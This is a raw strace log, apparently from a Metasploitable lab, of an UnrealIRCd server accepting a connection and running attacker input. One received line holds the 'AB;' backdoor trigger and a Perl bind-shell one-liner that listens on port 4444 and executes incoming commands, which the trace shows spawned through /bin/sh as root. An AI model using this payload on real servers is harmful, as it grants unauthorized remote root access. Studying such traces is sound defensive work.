4519  07:42:46.704209 select(1024, [2 3 4 7 9], [], NULL, {0, 870000}) = 1 (in [4], left {0, 820000})

4519  07:42:46.747944 clock_gettime(CLOCK_MONOTONIC, {2976, 564986912}) = 0

4519  07:42:46.748019 recv(4, "PRIVMSG  #testit BLABLALBLALBLALBLALBLALBLALBLALABLLALBLA\n", 8192, 0) = 58

4519  07:42:46.748073 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:42:46.748107 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:42:46.748132 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:42:46.748149 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:42:46.748163 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:42:46.748177 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:42:46.748191 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:42:46.748205 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:42:46.748218 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:42:46.748232 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:42:46.748245 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:42:46.748259 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:42:46.748272 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:42:46.748285 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:42:46.748299 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:42:46.748312 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:42:46.748325 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:42:46.748339 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:42:46.748391 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:42:46.748422 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:42:46.748436 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:42:46.748450 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 580000}, ...}) = 0

4519  07:42:46.748469 gettimeofday({1495626166, 748473}, NULL) = 0

4519  07:42:46.748482 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {0, 880000})

4519  07:42:46.868084 clock_gettime(CLOCK_MONOTONIC, {2976, 685105230}) = 0

4519  07:42:46.868105 time(NULL)        = 1495626166

4519  07:42:46.868116 time(NULL)        = 1495626166

4519  07:42:46.868137 gettimeofday({1495626166, 868142}, NULL) = 0

4519  07:42:46.868177 select(1024, [2], [], NULL, {0, 0}) = 1 (in [2], left {0, 0})

4519  07:42:46.868232 clock_gettime(CLOCK_MONOTONIC, {2976, 685244629}) = 0

4519  07:42:46.868242 gettimeofday({1495626166, 868246}, NULL) = 0

4519  07:42:46.868253 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {1, 0})

4519  07:42:46.868291 clock_gettime(CLOCK_MONOTONIC, {2976, 685304129}) = 0

4519  07:42:46.868303 accept(2, 0, NULL) = 5

4519  07:42:46.868324 getpeername(5, {sa_family=AF_INET, sin_port=htons(46255), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:42:46.868356 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:42:46.868369 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:42:46.868382 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:42:46.868394 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:42:46.868406 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:42:46.868417 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:42:46.868429 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:42:46.868452 clock_gettime(CLOCK_MONOTONIC, {2976, 685517417}) = 0

4519  07:42:46.868517 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6

4519  07:42:46.868529 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:42:46.868547 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:42:46.868557 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0

4519  07:42:46.868567 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:42:46.868584 send(6, "\303\262\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:42:46.868671 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:42:46.868710 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n", 70, 0) = 70

4519  07:42:46.868775 gettimeofday({1495626166, 868780}, NULL) = 0

4519  07:42:46.868802 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {1, 0})

4519  07:42:46.871580 clock_gettime(CLOCK_MONOTONIC, {2976, 688597945}) = 0

4519  07:42:46.871598 recvfrom(6, "\303\262\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\0\6\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:42:46.871649 close(6)          = 0

4519  07:42:46.871664 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:42:46.871679 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 104, 0) = 104

4519  07:42:46.871727 time(NULL)        = 1495626166

4519  07:42:46.871740 time(NULL)        = 1495626166

4519  07:42:46.871752 gettimeofday({1495626166, 871755}, NULL) = 0

4519  07:42:46.871763 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:42:46.871793 clock_gettime(CLOCK_MONOTONIC, {2976, 688805642}) = 0

4519  07:42:46.871803 gettimeofday({1495626166, 871807}, NULL) = 0

4519  07:42:46.871814 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})

4519  07:42:46.871853 clock_gettime(CLOCK_MONOTONIC, {2976, 688866012}) = 0

4519  07:42:46.871865 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:42:46.871893 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:42:46.871912 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:42:46.871925 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:42:46.871939 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 12507

12507 07:42:46.872009 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

12507 07:42:46.872023 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

12507 07:42:46.872034 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12507 07:42:46.872048 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

12507 07:42:46.872170 brk(0)            = 0x80f9000

12507 07:42:46.872194 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12507 07:42:46.872211 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f93000

12507 07:42:46.872227 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

12507 07:42:46.872245 open("/etc/ld.so.cache", O_RDONLY) = 1

12507 07:42:46.872258 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

12507 07:42:46.872277 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f8b000

12507 07:42:46.872287 close(1)          = 0

12507 07:42:46.872298 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12507 07:42:46.872313 open("/lib/libncurses.so.5", O_RDONLY) = 1

12507 07:42:46.872326 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

12507 07:42:46.872427 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

12507 07:42:46.872445 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f5b000

12507 07:42:46.872457 mmap2(0xb7f88000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7f88000

12507 07:42:46.872474 close(1)          = 0

12507 07:42:46.872486 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12507 07:42:46.872500 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

12507 07:42:46.872514 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

12507 07:42:46.872605 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

12507 07:42:46.872622 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f57000

12507 07:42:46.872633 mmap2(0xb7f59000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f59000

12507 07:42:46.872657 close(1)          = 0

12507 07:42:46.872669 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12507 07:42:46.872683 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

12507 07:42:46.872697 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

12507 07:42:46.872790 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

12507 07:42:46.872807 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f56000

12507 07:42:46.872822 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e07000

12507 07:42:46.872833 mmap2(0xb7f50000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f50000

12507 07:42:46.872848 mmap2(0xb7f53000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f53000

12507 07:42:46.872862 close(1)          = 0

12507 07:42:46.872887 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e06000

12507 07:42:46.872899 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e066b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

12507 07:42:46.872955 mprotect(0xb7f50000, 4096, PROT_READ) = 0

12507 07:42:46.872992 munmap(0xb7f8b000, 29913) = 0

12507 07:42:46.873018 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12507 07:42:46.873032 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

12507 07:42:46.873051 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfbf55b0) = -1 ENOTTY (Inappropriate ioctl for device)

12507 07:42:46.873082 brk(0)            = 0x80f9000

12507 07:42:46.873091 brk(0x80fa000)    = 0x80fa000

12507 07:42:46.873103 brk(0x80fb000)    = 0x80fb000

12507 07:42:46.873119 getuid32()        = 0

12507 07:42:46.873128 getgid32()        = 0

12507 07:42:46.873137 geteuid32()       = 0

12507 07:42:46.873155 getegid32()       = 0

12507 07:42:46.873196 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12507 07:42:46.873224 time(NULL)        = 1495626166

12507 07:42:46.873237 brk(0x80fc000)    = 0x80fc000

12507 07:42:46.873252 brk(0x80fd000)    = 0x80fd000

12507 07:42:46.873270 open("/proc/meminfo", O_RDONLY) = 1

12507 07:42:46.873292 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

12507 07:42:46.873310 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f92000

12507 07:42:46.873321 read(1, "MemTotal:      1035240 kB\nMemFree:        316084 kB\nBuffers:         88684 kB\nCached:         469164 kB\nSwapCached:          0 kB\nActive:         258040 kB\nInactive:       428728 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        315844 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            4576 kB\nWriteback:           0 kB\nAnonPages:      128984 kB\nMapped:          52008 kB\nSlab:            21080 kB\nSReclaimable:    12236 kB\nSUnreclaim:       8844 kB\nPageTables:       1976 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

12507 07:42:46.873406 close(1)          = 0

12507 07:42:46.873417 munmap(0xb7f92000, 4096) = 0

12507 07:42:46.873429 brk(0x80fe000)    = 0x80fe000

12507 07:42:46.873455 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

12507 07:42:46.873468 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

12507 07:42:46.873480 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

12507 07:42:46.873492 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

12507 07:42:46.873504 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

12507 07:42:46.873516 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

12507 07:42:46.873529 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12507 07:42:46.873540 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

12507 07:42:46.873557 uname({sys="Linux", node="metasploitable", ...}) = 0

12507 07:42:46.873605 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

12507 07:42:46.873623 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

12507 07:42:46.873641 brk(0x8100000)    = 0x8100000

12507 07:42:46.873661 getcwd("/etc/unreal", 4096) = 12

12507 07:42:46.873676 getpid()          = 12507

12507 07:42:46.873693 getppid()         = 4519

12507 07:42:46.873708 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

12507 07:42:46.873728 stat64("/sbin/sh", 0xbfbf5588) = -1 ENOENT (No such file or directory)

12507 07:42:46.873740 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

12507 07:42:46.873758 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

12507 07:42:46.873782 socket(PF_FILE, SOCK_STREAM, 0) = 1

12507 07:42:46.873794 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

12507 07:42:46.873806 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

12507 07:42:46.873827 close(1)          = 0

12507 07:42:46.873839 socket(PF_FILE, SOCK_STREAM, 0) = 1

12507 07:42:46.873849 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

12507 07:42:46.873859 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

12507 07:42:46.873878 close(1)          = 0

12507 07:42:46.873891 open("/etc/nsswitch.conf", O_RDONLY) = 1

12507 07:42:46.873905 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

12507 07:42:46.873922 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f92000

12507 07:42:46.873933 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

12507 07:42:46.873982 read(1, "", 4096) = 0

12507 07:42:46.873992 close(1)          = 0

12507 07:42:46.874001 munmap(0xb7f92000, 4096) = 0

12507 07:42:46.874017 open("/etc/ld.so.cache", O_RDONLY) = 1

12507 07:42:46.874029 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

12507 07:42:46.874045 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f8b000

12507 07:42:46.874055 close(1)          = 0

12507 07:42:46.874066 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12507 07:42:46.874080 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

12507 07:42:46.874095 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

12507 07:42:46.874193 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

12507 07:42:46.874211 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dfd000

12507 07:42:46.874226 mmap2(0xb7e04000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7e04000

12507 07:42:46.874244 close(1)          = 0

12507 07:42:46.874256 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12507 07:42:46.874269 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

12507 07:42:46.874283 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

